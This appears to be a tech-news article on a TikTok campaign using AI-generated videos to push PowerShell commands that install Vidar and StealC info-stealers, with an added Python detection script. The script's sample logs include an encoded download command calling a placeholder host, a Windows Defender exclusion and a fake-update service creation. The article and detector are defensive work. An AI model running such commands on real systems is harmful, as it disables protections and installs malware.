Hackers Use TikTok and AI to Spread Info-Stealing Malware
Cybercriminals are using TikTok videos to spread information-stealing malware. The campaign targets users seeking pirated software on the Chinese platform.
These deceptive videos, masquerading as legitimate tutorials, instruct viewers to execute PowerShell commands under the guise of software activation. Instead, these commands install malware variants like Vidar and StealC, which harvest sensitive data including documents, cryptocurrency wallets, and login credentials.
AI-Generated Videos as a Malware Delivery Tool
The campaign utilizes AI to create convincing tutorial videos that guide users through fake software activation processes. By leveraging TikTok’s trusted environment, attackers increase the likelihood of users executing malicious commands, making this method particularly insidious.
TikTok Malware: Advanced Infection Techniques
Upon execution, the PowerShell scripts employ advanced obfuscation techniques, such as base64 encoding, to conceal malicious URLs. The malware disables Windows Defender monitoring for specific directories and establishes persistence by installing itself as a trusted Windows Update service, ensuring continued operation even after system reboots.
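The three behaviours described above (a base64-encoded PowerShell command hiding a download URL, a Windows Defender exclusion for the drop directory, and a service named to look like Windows Update) are each visible in command-line or script-block logs. The following triage helper is an added example written for this article, not code from the researchers or from the campaign; it decodes `-EncodedCommand` arguments and flags the three indicators. The log lines, the `example.invalid` host, the paths and the service name are all constructed for the demonstration.

```python
"""
Added example (not from the article): scan constructed PowerShell
command-line log entries for the behaviours the article describes.
"""
import base64
import re

# -EncodedCommand and its short forms, followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_PATTERN = re.compile(r"https?://[^\s'\"]+", re.I)
# Defender exclusion being added for a directory.
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)
# Service creation whose arguments mention "update" (Windows Update lookalike).
SERVICE_PERSISTENCE = re.compile(r"(New-Service|sc(?:\.exe)?\s+create)\b.*?(update)", re.I)


def encode_command(script):
    """Build a constructed -EncodedCommand argument (PowerShell expects UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded payload of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_line(line):
    """Return the list of indicator names found in one log line."""
    findings = []
    text = line
    decoded = decode_encoded_command(line)
    if decoded is not None:
        findings.append("encoded_command")
        text = line + " " + decoded  # also inspect the hidden payload
        if URL_PATTERN.search(decoded):
            findings.append("url_in_encoded_payload")
    if DEFENDER_EXCLUSION.search(text):
        findings.append("defender_exclusion")
    if SERVICE_PERSISTENCE.search(text):
        findings.append("service_persistence")
    return findings


def triage(lines):
    """Map each suspicious line to its indicators; lines with no findings are omitted."""
    return {line: hits for line in lines if (hits := analyze_line(line))}


# Constructed sample log lines; hostnames, paths and names are placeholders.
SAMPLE_LOGS = [
    "powershell.exe Get-Service -Name wuauserv",  # benign admin activity
    "powershell.exe -nop -w hidden -EncodedCommand "
    + encode_command("iwr https://example.invalid/payload.ps1 -OutFile $env:TEMP\\p.ps1"),
    "powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\Public\\Temp",
    'sc.exe create "WinUpdateSvc" binPath= "C:\\Users\\Public\\Temp\\p.exe" start= auto',
]

if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOGS).items():
        print(hits, "<-", line[:80])
```

In practice the input would come from Windows event 4688 command lines or PowerShell script-block logs (event 4104); decoding the payload before matching is what makes the hidden URL visible, since the raw command line contains only base64.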
TikTok Malware Infrastructure and Evasion
Researchers have identified that the campaign’s infrastructure includes domains hosted on bulletproof hosting providers, allowing cybercriminals to operate with minimal oversight. This setup complicates takedown efforts and contributes to the campaign’s resilience.
User Vigilance Advised
Users are advised to exercise caution when encountering software tutorials on social media platforms. Executing unverified commands can lead to severe security breaches. It’s crucial to rely on official sources for software and updates to mitigate the risk of malware infections.
Info-stealing malware embedded in apps typically disguises itself as a legitimate or useful application. Once a user installs the app, the malware silently runs in the background, harvesting sensitive data like login credentials, browsing history, stored cookies, and even clipboard content. It often targets autofill data from browsers and saved passwords, then transmits this stolen information to a remote server controlled by the attacker. Some advanced variants can even evade antivirus detection by mimicking normal app behavior.

Abdul Wasay explores emerging trends across AI, cybersecurity, startups and social media platforms in a way anyone can easily follow.